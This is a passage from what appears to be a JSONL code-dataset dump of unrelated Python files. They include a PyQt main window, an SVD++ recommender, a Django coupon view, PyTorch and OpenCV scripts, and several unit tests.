use\n position: position of the toolbar\n\n Raises:\n ValueError: position does not exist\n \"\"\"\n if position not in TOOLBAR_AREAS:\n raise ValueError(\"Position not existing\")\n self.addToolBar(TOOLBAR_AREAS[position], toolbar)\n\n def add_toolbar_break(self, position: str = \"top\"):\n \"\"\"Adds a toolbar break to the given area\n after all the other objects that are present.\n\n Valid values for position: \"left\", \"right\", \"top\", \"bottom\"\n\n Args:\n position: position of the toolbar\n\n Raises:\n ValueError: position does not exist\n \"\"\"\n if position not in TOOLBAR_AREAS:\n raise ValueError(\"Position not existing\")\n self.addToolBarBreak(TOOLBAR_AREAS[position])\n\n def load_window_state(self):\n settings = core.Settings()\n geom = settings.value(\"mainwindow.geometry\", None)\n state = settings.value(\"mainwindow.state\", None)\n if geom is not None and state is not None:\n try:\n self.restoreGeometry(geom)\n self.restoreState(state)\n except TypeError:\n logging.info(\"Wrong type for window state. Probably Qt binding switch?\")\n pass\n\n def closeEvent(self, event):\n \"\"\"\n override, gets executed when app gets closed.\n saves GUI settings\n \"\"\"\n settings = core.Settings()\n settings.set_value(\"mainwindow.geometry\", self.saveGeometry())\n settings.set_value(\"mainwindow.state\", self.saveState())\n super().closeEvent(event)\n event.accept()\n\n def set_icon(self, icon: Union[QtGui.QIcon, str, None]):\n \"\"\"set the icon for the menu\n\n Args:\n icon: icon to use\n \"\"\"\n if not icon:\n icon = gui.Icon()\n elif isinstance(icon, str):\n icon = qta.icon(icon, color=\"lightgray\")\n self.setWindowIcon(icon)\n\n def add_widget_as_dock(self,\n name: str,\n title: str,\n vertical: bool = True,\n position: str = \"left\") -> widgets.DockWidget:\n dock_widget = widgets.DockWidget(self, name=name, title=title)\n widget = widgets.Widget()\n widget.id = f\"{name}.widget\"\n orientation = \"vertical\" if vertical else \"horizontal\"\n layout = widgets.BoxLayout(orientation, widget, margin=0)\n dock_widget.setWidget(widget)\n self.add_dockwidget(dock_widget, position)\n dock_widget.box = layout\n return dock_widget\n\n def add_dockwidget(self, dockwidget, position: str = \"left\"):\n position = DOCK_POSITIONS[position]\n self.addDockWidget(QtCore.Qt.DockWidgetArea(position), dockwidget)\n\n def remove_dockwidgets(self, dockwidgets: list):\n for i in dockwidgets:\n self.removeDockWidget(i)\n\n def get_docks(self) -> list:\n return self.find_children(QtWidgets.QDockWidget, recursive=False)\n\n def get_toolbars(self) -> list:\n return self.find_children(QtWidgets.QToolBar, recursive=False)\n\n def toggle_fullscreen(self):\n \"\"\"toggle between fullscreen and regular size\n \"\"\"\n if self.isFullScreen():\n self.showNormal()\n else:\n self.showFullScreen()\n\n\nif __name__ == \"__main__\":\n app = widgets.app()\n form = MainWindow()\n form.show()\n app.exec_()\n","sub_path":"prettyqt/widgets/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":6772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"556968139","text":"import pandas as pd\n\naudio = pd.read_csv(\"./data/dataset_with_clusters.csv\", header=0)\nlyrics = pd.read_csv(\"./data/dataset_with_clusters_lyrics.csv\", header=0)\n\ndataset = audio.set_index('remote_id').join(lyrics.set_index('ID'), lsuffix='_audio', rsuffix='_lyrics')\n\nprint(dataset.head())\n\nmatching_clusters = dataset[dataset['cluster_audio'] == 
dataset['cluster_lyrics']]\n\n\ndef get_dataframe_size(dataframe: pd.DataFrame):\n    rows, _ = dataframe.shape\n\n    return rows\n\n\nmatching_ratio = get_dataframe_size(matching_clusters) / get_dataframe_size(dataset)\n\nprint(matching_ratio)\n\n\nprint(matching_clusters[['cluster_audio', 'cluster_lyrics']])","sub_path":"analysis/analyze_results.py","file_name":"analyze_results.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
+{"seq_id":"433184443","text":"import math\nimport pickle\nimport time\nimport numpy as np\n\n#calculate the overall average\ndef average(filename):\n    fi = open(filename,'r')\n    result = 0.0\n    cnt = 0\n    for line in fi:\n        cnt += 1\n        arr = line.split()\n        result += int(arr[2].strip())\n    return result/cnt\n\ndef InterProduct(v1,v2):\n    result = 0\n    for i in range(len(v1)):\n        result += v1[i] * v2[i]\n    return result\n\ndef PredictScore(av,bu,bi,pu,qi):\n    pScore = av + bu + bi + InterProduct(pu,qi)\n    if pScore < 1:\n        pScore = 1\n    elif pScore > 5:\n        pScore = 5\n    return pScore\n\n#def SVD(configureFile, testDataFile, trainDataFile, modelSaveFile):\ndef SVD(configureFile,trainDataFile,modelSaveFile):\n    #get the configure\n    fi = open(configureFile,'r')\n    line = fi.readline()\n    arr = line.split()\n    averageScore = float(arr[0].strip())\n    userNum = int(arr[1].strip())\n    itemNum = int(arr[2].strip())\n    factorNum = int(arr[3].strip())\n    learnRate = float(arr[4].strip())\n    regularization = float(arr[5].strip())\n    fi.close()\n\n    bi = [0.0 for i in range(itemNum)] # bi: per-item rating bias (deviation from the average score)\n    bu = [0.0 for i in range(userNum)] # bu: per-user rating bias (deviation from the average score)\n    sum_ys = [0.0 for i in range(factorNum)]\n    temp = math.sqrt(factorNum)\n    w = math.sqrt(itemNum)\n    qi = np.array([[(0.1 * np.random.random() / temp) for j in range(factorNum)] for i in range(itemNum)]) # build the item/factor matrix\n    pu = np.array([[(0.1 * np.random.random() / temp) for j in range(factorNum)] for i in range(userNum)]) # build the user/factor matrix\n    print('initialization end\\nstart training\\n')\n    Y = np.random.normal(0,1,size=(itemNum,factorNum)) # build the item/factor matrix\n    #train model\n    preRmse = 100000000.0\n\n    for step in range(50):\n        fi = open(trainDataFile,'r')\n        for line in fi:\n            arr = line.split()\n            uid = int(arr[0].strip()) - 1\n            iid = int(arr[1].strip()) - 1\n            # uid = int(arr[0].strip())\n            # iid = int(arr[1].strip())\n            score = float(arr[2].strip())\n            prediction = PredictScore(averageScore,bu[uid],bi[iid],pu[uid],qi[iid]) # predicted score\n\n            eui = score - prediction # difference between the actual score and the predicted score\n\n            #update parameters\n            bu[uid] += learnRate * (eui - regularization * bu[uid])\n            bi[iid] += learnRate * (eui - regularization * bi[iid])\n            sum_f = np.sum(Y, axis=0)\n\n            for k in range(factorNum):\n                temp = pu[uid][k] #attention here,must save the value of pu before updating\n                sum_ys[k] = sum_f[k] / w\n                pu[uid][k] += learnRate * (eui * qi[iid][k] - regularization*temp)\n                qi[iid][k] += learnRate * (eui * (temp + sum_ys[k]) -regularization * qi[iid][k])\n                Y[iid][k] += learnRate * (eui * qi[iid][k]/w - regularization * Y[iid][k])\n\n        fi.close()\n        #learnRate *= 0.9\n        curRmse = Validate(trainDataFile, averageScore, bu, bi, pu, qi)\n        print(\"test_RMSE in step %d: %f\" %(step, curRmse))\n        if curRmse >= preRmse:\n            break\n        else:\n            preRmse = curRmse\n    #write the model to files\n    fo = open(modelSaveFile,'wb')\n    pickle.dump(bu,fo,True)\n    pickle.dump(bi, fo, True)\n    pickle.dump(qi, fo, True)\n    pickle.dump(pu, fo, True)\n    fo.close()\n    print('model generation over')\n\n#validate the model\ndef Validate(testDataFile,av,bu,bi,pu,qi):\n    cnt = 0\n
rmse = 0.0\n fi = open(testDataFile,'r')\n for line in fi:\n cnt += 1\n arr = line.split()\n uid = int(arr[0].strip()) - 1\n iid = int(arr[1].strip()) - 1\n # uid = int(arr[0].strip())\n # iid = int(arr[1].strip())\n pScore = PredictScore(av,bu[uid],bi[iid],pu[uid],qi[iid])\n\n tScore = float(arr[2].strip())\n #print('tScore%f'%tScore,'pScore%f\\n'%pScore)\n rmse += (tScore - pScore) * (tScore - pScore)\n fi.close()\n return math.sqrt(rmse/cnt)\n\n#use the model to make predict\ndef predict(configureFile,modelSaveFile,testDataFile,resultSaveFile):\n #get parameter\n fi = open(configureFile,'r')\n line = fi.readline()\n arr = line.split()\n averageScore = float(arr[0].strip())\n fi.close()\n\n #get model\n fi = open(modelSaveFile,'rb')\n bu = pickle.load(fi)\n bi = pickle.load(fi)\n qi = pickle.load(fi)\n pu = pickle.load(fi)\n fi.close()\n\n #predict\n fi = open(testDataFile,'r')\n fo = open(resultSaveFile,'w')\n for line in fi:\n arr = line.split()\n uid = int(arr[0].strip()) - 1\n iid = int(arr[1].strip()) - 1\n # uid = int(arr[0].strip())\n # iid = int(arr[1].strip())\n pScore = PredictScore(averageScore,bu[uid],bi[iid],pu[uid],qi[iid])\n fo.write('{} {} {}'.format(arr[0],arr[1],pScore))\n fo.write('\\n')\n fi.close()\n fo.close()\n result = test_rmse(testDataFile,resultSaveFile)\n print('test_RMSE is %f'%result)\n print('predict over')\n\ndef test_rmse(testDataFile,resultSaveFile):\n fi = open(testDataFile,'r')\n fo = open(resultSaveFile,'r')\n test_score = []\n predict_score = []\n rmse = 0\n cnt = 0\n for i in fi:\n test_score.append(float(i.split()[2].strip()))\n fi.close()\n for i in fo:\n predict_score.append(float(i.split()[2].strip()))\n fo.close()\n score = zip(test_score,predict_score)\n for tScore,pScore in score:\n cnt += 1\n rmse += (tScore - pScore) * (tScore - pScore)\n return math.sqrt(rmse/cnt)\n\nif __name__ == '__main__':\n configureFile = 'svd.conf'\n\n testDataFile = '../map/smallPredictionMatrix.txt'\n trainDataFile = '../map/smallMatrix.txt'\n modelSaveFile = 'svd_model.pkl'\n resultSaveFile = '../map/prediction.txt'\n\n SVD(configureFile,trainDataFile,modelSaveFile)\n predict(configureFile,modelSaveFile,testDataFile,resultSaveFile)\n","sub_path":"model/stochastic_gradient_descent_SVD/SVD++.py","file_name":"SVD++.py","file_ext":"py","file_size_in_byte":5930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"107111916","text":"favourite_places = {\n 'jan' : ['vietnam','laos','cambodia'],\n 'hermonie' : ['hongkong','macau','nepal'],\n 'rizwan' :['australia','luang prabung','malasia'],\n}\n\nfor key, value in favourite_places.items():\n print(f\"{key} loves the below places\")\n for place in value:\n print(place)\n print(\"\\n\")\n","sub_path":"c15.py","file_name":"c15.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"302010816","text":"\"\"\"Run test from the best model checkpoint\"\"\"\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom tqdm import tqdm\n\nfrom config import get_args\nfrom model import ResNet26, ResNet38, ResNet50\nfrom preprocess import load_data\n\n\ndef main(args, logger):\n train_loader, test_loader = load_data(args)\n if args.dataset == 'CIFAR10':\n num_classes = 10\n elif args.dataset == 'CIFAR100':\n num_classes = 100\n elif args.dataset == 'IMAGENET':\n num_classes = 1000\n\n print('img_size: {}, num_classes: {}, stem: {}'.format(args.img_size, num_classes, args.stem))\n if 
args.model_name == 'ResNet26':\n print('Model Name: {0}'.format(args.model_name))\n model = ResNet26(num_classes=num_classes, stem=args.stem, dataset=args.dataset)\n elif args.model_name == 'ResNet38':\n print('Model Name: {0}'.format(args.model_name))\n model = ResNet38(num_classes=num_classes, stem=args.stem, dataset=args.dataset)\n elif args.model_name == 'ResNet50':\n print('Model Name: {0}'.format(args.model_name))\n model = ResNet50(num_classes=num_classes, stem=args.stem, dataset=args.dataset)\n\n if args.pretrained_model:\n filename = 'best_model_' + str(args.dataset) + '_' + str(args.model_name) + '_' + str(args.stem) + '_ckpt.tar'\n print('filename :: ', filename)\n file_path = os.path.join(args.checkpoint_dir, filename)\n checkpoint = torch.load(file_path)\n\n model.load_state_dict(checkpoint['state_dict'])\n start_epoch = checkpoint['epoch']\n best_acc = checkpoint['best_acc']\n model_parameters = checkpoint['parameters']\n print('Load model, Parameters: {0}, Start_epoch: {1}, Acc: {2}'.format(model_parameters, start_epoch, best_acc))\n logger.info('Load model, Parameters: {0}, Start_epoch: {1}, Acc: {2}'.format(model_parameters, start_epoch, best_acc))\n else:\n start_epoch = 1\n best_acc = 0.0\n\n if args.cuda:\n if torch.cuda.device_count() > 1:\n model = nn.DataParallel(model)\n model = model.cuda()\n\n eval(model, test_loader, args)\n\n\ndef eval(model, test_loader, args):\n print('evaluation ...')\n model.eval()\n correct = 0\n with torch.no_grad():\n for data, target in tqdm(test_loader):\n if args.cuda:\n data, target = data.cuda(), target.cuda()\n output = model(data)\n prediction = output.data.max(1)[1]\n correct += prediction.eq(target.data).sum()\n\n acc = 100. * float(correct) / len(test_loader.dataset)\n print('Test acc: {0:.2f}'.format(acc))\n return acc\n\n\nif __name__ == '__main__':\n args, logger = get_args()\n main(args, logger)\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"389650606","text":"#!/usr/bin/env python\nimport sys\nfrom search import Search\n\n\nif __name__ == '__main__':\n try:\n i = Search()\n\n # Make a copy of the list\n # and pop the python file name\n args = sys.argv\n args.pop(0)\n\n # Search\n r = i.query(args)\n\n print('Result from search') \n print(r['AbstractURL'])\n\n except Exception as e:\n print('error', e)\n","sub_path":"ddg/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"224462896","text":"class Mobile:\n fp=\"yes\" # class variable / static variable\n\n def __init__(self):\n self.model=\"RealMe X\" # instance variable\n def show_model(self): # instance Method\n print(\"Model: \",self.model) # Accessing instance variable\n\n @classmethod # class method\n def car(cls):\n print(\"Finger Print: \", cls.fp) # Accessing class variable\n\n\nrealme=Mobile() # object creation\nrealme.show_model() # Accessing instance method outside the class\nMobile.car() # Accessing class method outside the class\nprint()\nMobile.fp=\"No\" # Change the value of class variable/static variable using class\nMobile.car() # Accessing class method outside the class\n","sub_path":"Python_P_P/Class_Variable_or static_Variable_classmethod.py","file_name":"Class_Variable_or 
static_Variable_classmethod.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"454848051","text":"import sys\r\ntolerance = []\r\ntolerance.append(int(sys.argv[1])) #local\r\ntolerance.append(int(sys.argv[2])) #zero\r\ntolerance.append(int(sys.argv[3])) #width\r\n#tolerance = [4, 4, 7]\r\nzeroMaxTXT = open('C:/50_reprap_python_beanshell/maxZero.txt', 'r')\r\nzeroMinTXT = open('C:/50_reprap_python_beanshell/minZero.txt', 'r')\r\nminXTXT = open('C:/50_reprap_python_beanshell/minCoor.txt', 'r')\r\nmaxXTXT = open('C:/50_reprap_python_beanshell/maxCoor.txt', 'r')\r\nminCoorLABTXT = open('C:/50_reprap_python_beanshell\\minCoorLAB.txt', 'r')\r\nmaxCoorLABTXT = open('C:/50_reprap_python_beanshell\\maxCoorLAB.txt', 'r')\r\nerrorListTXT = open('C:/50_reprap_python_beanshell\\errorList.txt', 'w')\r\n\r\nminCoorLAB = []\r\nmaxCoorLAB = []\r\ncoorZ_LAB = []\r\nmaxX = []\r\nminX = []\r\nmaxZ = []\r\nerror = []\r\nzeroMax = []\r\nzeroMin = []\r\n\r\n\r\nfor line in maxCoorLABTXT:\r\n maxCoorLAB.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n coorZ_LAB.append(float(line[line.find('\\t', None, None)+1:].replace(',', '.')))\r\n\r\nfor line in minCoorLABTXT:\r\n minCoorLAB.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n\r\nfor line in maxXTXT:\r\n maxX.append(float(line[:line.find('\\t', None, None)]))\r\n maxZ.append(float(line[line.find('\\t', None, None)+1:]))\r\n\r\nfor line in minXTXT:\r\n minX.append(float(line[:line.find('\\t', None, None)]))\r\n\r\nfor line in zeroMaxTXT:\r\n zeroMax.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n\r\nfor line in zeroMinTXT:\r\n zeroMin.append(float(line[:line.find('\\t', None, None)].replace(',', '.')))\r\n\r\n\r\ntransformZ = coorZ_LAB[0]\r\nbegin = maxZ[0]\r\nlay = maxZ[1] - maxZ[0]\r\npxMm = (maxX[0] - minX[0])/(zeroMax[0] - zeroMin[0])\r\n\r\n\r\nerrorListTXT.write('pxMm : ' + str(pxMm) + '\\n')\r\n\r\nfor i in range(len(maxCoorLAB) - 1):\r\n check = False\r\n highRake = ((transformZ - coorZ_LAB[i])*pxMm + begin)\r\n startCount = (highRake - begin)//lay\r\n t1 = abs((maxCoorLAB[i] - maxCoorLAB[i+1]) * pxMm)\r\n t2 = abs((maxCoorLAB[i] - zeroMax[-1]) * pxMm)\r\n widthReal = (maxCoorLAB[i] - minCoorLAB[i]) * pxMm\r\n '''\r\n print('coorZ_LAB[i] : ', coorZ_LAB[i])\r\n print('hR : ', highRake)\r\n print('strat : ', startCount)\r\n print('i : ', i)\r\n print('t1 : ', t1)\r\n print('t2 : ', t2)\r\n '''\r\n errorListTXT.write(str(coorZ_LAB[i]) + '____________________________\\n')\r\n\r\n for j in range(int(startCount) - 2, int(startCount) + 3):\r\n if (j+1 < len(maxX)) and (j >= 0):\r\n t3 = abs(maxX[j] - maxX[j+1])\r\n t4 = abs(maxX[j] - maxX[0])\r\n widthNom = maxX[j] - minX[j]\r\n\r\n '''\r\n print('t3 : ', t3)\r\n print('t4 : ', t4)\r\n print('widthReal : ', widthReal)\r\n print('widthNom : ', widthNom)\r\n '''\r\n\r\n if (abs(t1 - t3)/(widthReal / 100) < tolerance[0]) and (abs(t2 - t4)/(widthReal / 100) < tolerance[1]) and (abs(widthReal - widthNom)/(widthReal / 100) < tolerance[2]):\r\n check = True\r\n\r\n errorListTXT.write('width : ' + str(abs(widthReal - widthNom)/(widthReal / 100)) + '\\n')\r\n errorListTXT.write('local : ' + str(abs(t1 - t3)/(widthReal / 100)) + '\\n')\r\n errorListTXT.write('byZero : ' + str(abs(t2 - t4)/(widthReal / 100)) + '\\n')\r\n\r\n if check is False:\r\n error.append(str(coorZ_LAB[i]))\r\n\r\n #print(' :___________________________________________________', 
check)\r\n\r\nfor i in error:\r\n print(i)\r\n","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"385644300","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.http import JsonResponse\nfrom coupons import settings as coupon_settings\nfrom . import models\n\n\ndef get_coupon_details(request):\n code = request.GET.get('code', None)\n types = request.GET.get('types', None)\n products = request.GET.get('products', [])\n if code is None:\n data = {'err': _(\"Please provide a coupon code.\")}\n return JsonResponse(data)\n try:\n coupon = models.Coupon.objects.get_coupon(code)\n except models.Coupon.DoesNotExist:\n data = {'err': _(\"This code is not valid.\")}\n return JsonResponse(data)\n\n if not coupon.active:\n data = {'err': _(\"This coupon is not active\")}\n return JsonResponse(data)\n\n if request.user.is_anonymous and coupon.user_limit > 1:\n data = {'err': _(\"You must be logged in to use this coupon\")}\n return JsonResponse(data)\n\n if coupon.is_redeemed:\n data = {'err': _(\"This coupon has already been redeemed\")}\n return JsonResponse(data)\n\n if request.user.is_anonymous:\n user = None\n else:\n user = request.user\n try: # check if there is a user bound coupon existing\n user_coupon = coupon.users.get(user=user)\n if user_coupon.redeemed_at is not None:\n data = {'err': _(\"You have already redeemed this coupon once.\")}\n return JsonResponse(data)\n except models.CouponUser.DoesNotExist:\n if coupon.user_limit is not 0: # zero means no limit of user count\n if not coupon.bulk:\n # only user bound coupons left and you don't have one\n if coupon.user_limit is coupon.users.filter(user__isnull=False).count():\n data = {'err': _(\"This code is not valid for your account.\")}\n return JsonResponse(data)\n if coupon.user_limit is coupon.users.filter(redeemed_at__isnull=False).count(): # all coupons redeemed\n data = {'err': _(\"This code has already been used.\")}\n return JsonResponse(data)\n else:\n if coupon.users.filter(code=code).exists():\n data = {'err': _(\"This code has already been used\")}\n return JsonResponse(data)\n if coupon.bulk_number is coupon.users.filter(user__isnull=False).count():\n data = {'err': _(\"This code is not valid for your account.\")}\n return JsonResponse(data)\n if types is not None and coupon.type not in types:\n data = {'err': _(\"This code is not meant to be used here.\")}\n return JsonResponse(data)\n if coupon.expired():\n data = {'err': _(\"This code is expired.\")}\n return JsonResponse(data)\n applicable_products = []\n if coupon_settings.PRODUCT_MODEL is not None:\n if len(products) != 0 and coupon.valid_products.count() > 0:\n for valid_product in coupon.valid_products.all():\n product_name = getattr(valid_product, coupon_settings.PRODUCT_NAME_FIELD)\n if product_name in products:\n applicable_products.append(product_name)\n if len(applicable_products) == 0:\n data = {'err': _(\"This code is not valid for the product selected.\")}\n return JsonResponse(data)\n data = {\n 'code': coupon.code,\n 'value': coupon.value,\n 'type': coupon.type,\n 'gift_certificate': coupon.productlineitem_set.exists(),\n }\n if len(applicable_products):\n data['products'] = applicable_products\n return 
JsonResponse(data)\n","sub_path":"coupons/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"575903220","text":"from . import objectives\n\n\nclass TestWordlist:\n\n def test_wordlist(self):\n w = objectives.wordlist()\n assert len(w) == 338_882\n\n\nclass TestReadable:\n\n def test_tdd(self):\n words = objectives.wordlist()\n results = objectives.readable(words)\n assert len(results) > 100\n print(len(results))\n\n for r in results:\n assert r[0] == r[1] + r[2]\n\n assert ('albums', 'al', 'bums') in results\n assert ('weaver', 'we', 'aver') in results\n\n def test_profiling(self):\n words = objectives.wordlist()\n for _ in range(100):\n objectives.readable(words)\n\n\nclass TestFast:\n\n def test_tdd(self):\n words = objectives.wordlist()\n results = objectives.fast(words)\n assert len(results) > 100\n print(len(results))\n\n for r in results:\n assert r[0] == r[1] + r[2]\n\n assert ('albums', 'al', 'bums') in results\n assert ('weaver', 'we', 'aver') in results\n\n def test_profiling(self):\n words = objectives.wordlist()\n for _ in range(100):\n objectives.fast(words)\n\n\nclass TestExtensible:\n\n def test_tdd(self):\n for i in [4, 6, 8]:\n words = objectives.wordlist()\n results = objectives.extensible(words, i)\n assert len(results) > 100\n print(len(results))\n print(results[1000])\n print(results[5000])\n\n for r in results:\n assert len(r[0]) == i\n assert r[0] == r[1] + r[2]\n","sub_path":"kata20190320/test_objectives.py","file_name":"test_objectives.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"649093366","text":"# demo_weightedsum.py\n\nimport cv2\n\nimg1 = cv2.imread('dog.jpg', 1)\nimg2 = cv2.imread('cat.jpg', 1)\n\nprint(img1.shape)\nprint(img2.shape)\n\nimg2 = img2[0:img1.shape[0], 0:img1.shape[1], :]\nprint(img2.shape)\n\n# quit()\n\ncv2.imshow('Weighted image', img1)\n\nprint('Switch to image window. 
Then press any key to continue.')\n\ncv2.waitKey(0) # Wait for key press\n\nN = 10\nfor i in range(N):\n y = cv2.addWeighted(img1, 1-i/(N-1), img2, i/(N-1), 0) # '0' is an additive const.\n # y : weighted sum of two images\n cv2.imshow('Weighted image', y)\n cv2.waitKey(500) # Wait 0.5 seconds\n \ncv2.destroyAllWindows()\n","sub_path":"Module 8/demo 22 - video _cv2_/demo 22 - video (cv2)/D3 - arithmetic operations/demo_weightedsum.py","file_name":"demo_weightedsum.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"372463555","text":"from ftw.testbrowser import browsing\nfrom ftw.testbrowser.pages import statusmessages\nfrom opengever.testing import IntegrationTestCase\nfrom ftw.testbrowser.pages import factoriesmenu\n\n\nclass TestCommitteeContainer(IntegrationTestCase):\n\n features = ('meeting',)\n\n @browsing\n def test_can_configure_ad_hoc_template(self, browser):\n self.login(self.administrator, browser)\n self.committee_container.ad_hoc_template = None\n\n self.assertIsNone(self.committee_container.ad_hoc_template)\n self.assertIsNone(self.committee_container.get_ad_hoc_template())\n\n browser.open(self.committee_container, view='edit')\n browser.fill({'Ad hoc agenda item template': self.proposal_template}).save()\n statusmessages.assert_no_error_messages()\n\n statusmessages.assert_message('Changes saved')\n\n self.assertIsNotNone(self.committee_container.ad_hoc_template)\n self.assertEqual(self.proposal_template,\n self.committee_container.get_ad_hoc_template())\n\n @browsing\n def test_can_configure_paragraph_template(self, browser):\n self.login(self.administrator, browser)\n self.committee_container.paragraph_template = None\n\n self.assertIsNone(self.committee_container.paragraph_template)\n self.assertIsNone(self.committee_container.get_paragraph_template())\n\n browser.open(self.committee_container, view='edit')\n browser.fill({'Paragraph template': self.sablon_template}).save()\n statusmessages.assert_no_error_messages()\n\n statusmessages.assert_message('Changes saved')\n\n self.assertIsNotNone(self.committee_container.paragraph_template)\n self.assertEqual(self.sablon_template,\n self.committee_container.get_paragraph_template())\n\n @browsing\n def test_can_add_with_templates(self, browser):\n self.login(self.manager, browser)\n browser.open()\n factoriesmenu.add('Committee Container')\n browser.fill({'Title': u'Sitzungen',\n 'Protocol header template': self.sablon_template,\n 'Protocol suffix template': self.sablon_template,\n 'Agenda item header template for the protocol': self.sablon_template,\n 'Agenda item suffix template for the protocol': self.sablon_template,\n 'Excerpt header template': self.sablon_template,\n 'Excerpt suffix template': self.sablon_template,\n 'Paragraph template': self.sablon_template,\n 'Ad hoc agenda item template': self.proposal_template}).save()\n statusmessages.assert_no_error_messages()\n\n self.assertEqual(self.proposal_template,\n browser.context.get_ad_hoc_template())\n self.assertEqual(self.sablon_template,\n browser.context.get_paragraph_template())\n self.assertEqual(self.sablon_template,\n browser.context.get_excerpt_header_template())\n self.assertEqual(self.sablon_template,\n browser.context.get_excerpt_suffix_template())\n\n @browsing\n def test_visible_fields_in_forms(self, browser):\n \"\"\"Some fields should only be displayed when the word feature is\n enabled.\n Therefore we test the appearance of all fields.\n \"\"\"\n fields = 
[u'Title',\n u'Protocol header template',\n u'Protocol suffix template',\n u'Agenda item header template for the protocol',\n u'Agenda item suffix template for the protocol',\n u'Excerpt header template',\n u'Excerpt suffix template',\n u'Agendaitem list template',\n u'Table of contents template',\n u'Ad hoc agenda item template',\n u'Paragraph template']\n self.login(self.manager, browser)\n\n browser.open()\n factoriesmenu.add('Committee Container')\n self.assertEquals(fields, browser.css('form#form > div.field > label').text)\n\n browser.open(self.committee_container, view='edit')\n self.assertEquals(fields, browser.css('form#form > div.field > label').text)\n","sub_path":"opengever/meeting/tests/test_committee_container_word.py","file_name":"test_committee_container_word.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"118676677","text":"# https://stackoverflow.com/questions/46440443/candlestick-plot-from-a-pandas-dataframe-retry\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import matplotlib.ticker as mticker\nfrom mpl_finance import candlestick_ohlc\nimport matplotlib.dates as mdates\nimport datetime as dt\nimport pandas as pd\n\n\n#df = pd.read_csv(\"Data/output.csv\", usecols=['Date', 'Open', 'High', 'Low', 'Close'])\ndf = pd.read_csv(\"C:\\\\Users\\\\aroom\\\\Documents\\\\Data\\\\forex\\\\EURUSD_m_ta.csv\",\n index_col='Date', parse_dates=True, usecols=['Date','Open','High','Low','Close'])\n\n#Reset the index to remove Date column from index\ndf_ohlc = df.reset_index()\n\n\n#Naming columns\ndf_ohlc.columns = [\"Date\",\"Open\",\"High\",'Low',\"Close\"]\n\n#Converting dates column to float values\ndf_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)\n\n#Making plot\nfig = plt.figure()\nax1 = plt.subplot2grid((6,1), (0,0), rowspan=6, colspan=1)\n\n#Converts raw mdate numbers to dates\nax1.xaxis_date()\nplt.xlabel(\"Date\")\nprint(df_ohlc)\n\n#Making candlestick plot\ncandlestick_ohlc(ax1, df_ohlc.values, width=1, colorup='g', colordown='k', alpha=0.75)\nplt.ylabel(\"Price\")\nplt.legend()\n\nplt.show()","sub_path":"plot_from_csv.py","file_name":"plot_from_csv.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"452593248","text":"import torch\nfrom torch_kalman.covariance import Covariance\nimport unittest\n\n\nclass TestCovariance(unittest.TestCase):\n def test_from_log_cholesky(self):\n covs = Covariance.from_log_cholesky(log_diag=torch.arange(1., 3.1).expand(3, -1),\n off_diag=torch.arange(1., 3.1).expand(3, -1))\n\n gt = torch.tensor([[7.3891, 2.7183, 5.4366],\n [2.7183, 55.5982, 24.1672],\n [5.4366, 24.1672, 416.4288]])\n for cov in covs:\n diff = (gt - cov).abs()\n self.assertTrue((diff < .0001).all())\n","sub_path":"tests/test_covariance.py","file_name":"test_covariance.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"384262101","text":"# -*- coding:UTF-8 -*-\n'''\nCreated on 2018年1月5日15:48:21\n\n@author: slp\n'''\n# 待检查的留言内容\ntoCheckUserLeavedMessageDict = {\n \"id\": None,\n \"createUser\": None,\n \"createDate\": None,\n \"updateUser\": None,\n \"updateDate\": None,\n \"sortField\": None,\n \"order\": None,\n \"tqmobile\": None,\n \"submitTime\": None,\n \"userName\": None,\n \"orgName\": None,\n \"orginternalCode\": None,\n \"content\": None,\n \"remark\": None\n 
